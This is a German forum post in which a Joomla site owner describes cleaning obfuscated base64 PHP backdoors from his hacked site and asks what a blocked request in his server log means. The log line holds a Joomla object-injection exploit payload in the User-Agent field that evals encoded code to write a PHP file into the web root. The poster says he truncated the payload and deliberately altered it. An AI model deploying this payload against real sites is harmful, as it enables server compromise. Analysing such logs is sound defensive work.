Willkommen Gast. Bitte anmelden oder registrieren.

Autor Thema: Angriff auf inszwischen Upgedates System  (Gelesen 1362 mal)

0 Mitglieder und 1 Gast betrachten dieses Thema.

bhoernchen

  • Unter Beobachtung
  • Beiträge: 1
Angriff auf inszwischen Upgedates System
« am: 25. Dezember 2015, 19:46:22 »
Ich habe ein Joomla System was angegriffen worden ist und gehackt wurde..  Asche auf mein Haupt ich hatte das Update 3.4.7 nicht gemacht und habe jetzt die Quittung bekommen..   das 3.4.8 mach ich heute auch noch ..  (ich habe gelernt)

Es ist jetzt Aktuelle und ich habe auch die letzten Tage damit verbracht dort über das Externen  Server Logfile alles raus zuschmeißen was dort nicht hin gehört..  Ich muss sagen es war zwar eine lästige sucharbeite aber es ist doch verhältnismäßig einfach gewesen und es hat sich gelohnt..  mir war aufgefallen das es Zugriffe über einen Post Befehl auf bestimmt Dateien gab (z.B. /plugins/system/cache/view79.php). die im Grunde einen Code enthielten der Joomla fremd war..  (Inhalt: Verschlüsselt Zeichen  base64_decod) .. Ich habe mir nicht die Mühe gemacht das zu untersuchen sondern nur die Dateien Local bei mir auf den Rechner gezogen und dann die Datei einfach gelöscht..

Hinzu kamen ein Reihe von Dateien die scheinbar ähnlichen Verschlüsslungen im Kopf enthielten. Auch die habe ich entschärft..  Im Moment bin ich dabei systematisch das System auszutauschen und Bestimmte Teile komplett zu Löschen und wieder per FTP zu erstellen..  (nur zur Vorsicht).

Jetzt habe ich in meinem Server Logfile einen Eintrage  gefunden der mir so aussieht wie ein Angriff.. der aber scheinbar abgewehrt worden ist weil er mit einer 403 als Antwort Quittiert worden ist..  Ich würde ihn aber gern verstehen. Damit ich mir ein Bild davon machen kann was genau dort versucht wird. Ich vermute das sind Joomla API Befehle zum Upload einer Datei. Bin aber da nicht wirklich der Meister drin.. kann mir einer Übersetzten was dort gemacht werden sollte oder der mir sonst irgendeinen Anhaltspunkt geben.  Bis auf das hier https://api.joomla.org/cms-2.5/index.html habe ich nicht viel ;)

41.185.21.66 - - [25/Dec/2015:18:32:24 +0100] "GET / HTTP/1.1" 403 538 "-" "}__test|O:21:\"JDatabaseDriverMysqlI\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:2918:\"eval(base64_decode('JHB3ZCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3gucGhwIjskcj1mb3BlbigiJHB3ZCIsIncrIik7Zndya.... Hier habe ich gekürzt ....
NvWDE5R1NVeEZYMThwT3lBL1BnPT0nKSk7ZmNsb3NlKCRyKTs='));JFactory::getConfik();exit\";s:19:\"cache_namefunction\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_clas\";O:20:\"JDatabaseDrivermysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

Ich habe abgesehen von der Kürzung ein paar fehler eingebaut die Leute die das Probieren wollen und so Planlos sind wie ich das Leben nicht einfacher machen werden..  Hoffe es hat es gebracht den verstehen tut ich nicht was das soll..